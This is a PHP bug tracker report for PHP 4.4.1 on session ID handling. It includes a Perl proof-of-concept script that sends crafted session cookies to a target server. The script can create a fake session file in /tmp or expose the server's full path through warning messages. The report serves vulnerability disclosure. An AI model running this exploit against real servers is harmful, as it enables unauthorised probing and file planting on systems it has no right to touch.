From: sienicki dot kamil at gmail dot com Operating system: Linux/Windows (all?) PHP version: 4.4.1 PHP Bug Type: Unknown/Other Function Bug description: problem with sessions..
Description: ------------ I write simple exploit to show this vuln.. (i think..) problem with sessions.. -- #!/usr/bin/perl # # PHP vulnerabilities.. # # Exploit (Proof Of Concept ?) by Kamil 'K3' Sienicki # # I found two possibility of use that bug.. (maybe more) # # display_errors must be On # use IO::Socket; if(@ARGV < 3) { print "\n"; print "PHP Exploit (POC)\n"; print " by Kamil 'K3' Sienicki\n\n"; print "1. Create fake session file (sess_fake) in directory (default /tmp). \n"; print "2. Full path disclosure.\n\n"; print "Usage: ./php_bug.pl [host] [address] [type of attack (1 or 2)]\n\n"; exit; } $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ARGV[0]", PeerPort => "80" ) || die "[-] Connect failed! \r\n"; if($ARGV[2] == 1) { print "\n"; print "PHP Exploit (POC)\n"; print " by Kamil 'K3' Sienicki\n\n"; print "Name of session (default PHPSESSID): "; $sess = <stdin>; print "Name of fake sess_file: "; $fake = <stdin>; chomp($sess,$fake); print $socket "GET $ARGV[1] HTTP/1.0\n"; print $socket "Cookie: $sess=$fake\n\n"; print "'$fake' fake file was created.. \n"; } elsif ($ARGV[2] == 2) { print "\n"; print "PHP Exploit (POC)\n"; print " by Kamil 'K3' Sienicki\n\n"; print "Name of session (default PHPSESSID): "; $sess = <stdin>; chomp($sess); print $socket "GET $ARGV[1] HTTP/1.0\n"; print $socket "Cookie: [EMAIL PROTECTED]"; while ($answer = <$socket>) { if ($answer =~ m/^...Warning/) { print $answer."\n"; } } } -- Reproduce code: --------------- <? session_start(); ?> Expected result: ---------------- Warning: session_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /htdocs/sess.php on line 3 Warning: Unknown(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in Unknown on line 0 Warning: Unknown(): Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in Unknown on line 0 Full path disclosure.. -- Edit bug report at http://bugs.php.net/?id=35429&edit=1 -- Try a CVS snapshot (php4): http://bugs.php.net/fix.php?id=35429&r=trysnapshot4 Try a CVS snapshot (php5.0): http://bugs.php.net/fix.php?id=35429&r=trysnapshot50 Try a CVS snapshot (php5.1): http://bugs.php.net/fix.php?id=35429&r=trysnapshot51 Fixed in CVS: http://bugs.php.net/fix.php?id=35429&r=fixedcvs Fixed in release: http://bugs.php.net/fix.php?id=35429&r=alreadyfixed Need backtrace: http://bugs.php.net/fix.php?id=35429&r=needtrace Need Reproduce Script: http://bugs.php.net/fix.php?id=35429&r=needscript Try newer version: http://bugs.php.net/fix.php?id=35429&r=oldversion Not developer issue: http://bugs.php.net/fix.php?id=35429&r=support Expected behavior: http://bugs.php.net/fix.php?id=35429&r=notwrong Not enough info: http://bugs.php.net/fix.php?id=35429&r=notenoughinfo Submitted twice: http://bugs.php.net/fix.php?id=35429&r=submittedtwice register_globals: http://bugs.php.net/fix.php?id=35429&r=globals PHP 3 support discontinued: http://bugs.php.net/fix.php?id=35429&r=php3 Daylight Savings: http://bugs.php.net/fix.php?id=35429&r=dst IIS Stability: http://bugs.php.net/fix.php?id=35429&r=isapi Install GNU Sed: http://bugs.php.net/fix.php?id=35429&r=gnused Floating point limitations: http://bugs.php.net/fix.php?id=35429&r=float No Zend Extensions: http://bugs.php.net/fix.php?id=35429&r=nozend MySQL Configuration Error: http://bugs.php.net/fix.php?id=35429&r=mysqlcfg